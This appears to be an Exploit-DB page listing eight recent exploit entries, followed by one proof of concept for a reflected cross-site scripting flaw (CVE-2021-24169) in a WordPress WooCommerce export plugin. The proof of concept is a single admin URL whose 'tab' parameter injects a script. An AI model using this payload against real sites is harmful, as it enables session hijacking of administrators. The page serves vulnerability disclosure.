c18c22e3d9
8 changes to exploits/shellcodes Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial-Of-Service (PoC) Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF) WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS) WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF) Budget and Expense Tracker System 1.0 - Arbitrary File Upload Police Crime Record Management Project 1.0 - Time Based SQLi
13 lines
No EOL
522 B
Text
13 lines
No EOL
522 B
Text
# Exploit Title: WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)
|
|
# Date: 15/2/2021
|
|
# Author: 0xB9
|
|
# Software Link: https://wordpress.org/plugins/woo-order-export-lite/
|
|
# Version: 3.1.7
|
|
# Tested on: Windows 10
|
|
# CVE: CVE-2021-24169
|
|
|
|
1. Description:
|
|
This plugin helps you to easily export WooCommerce order data. The tab parameter in the Admin Panel is vulnerable to XSS.
|
|
|
|
2. Proof of Concept:
|
|
wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(1)</script> |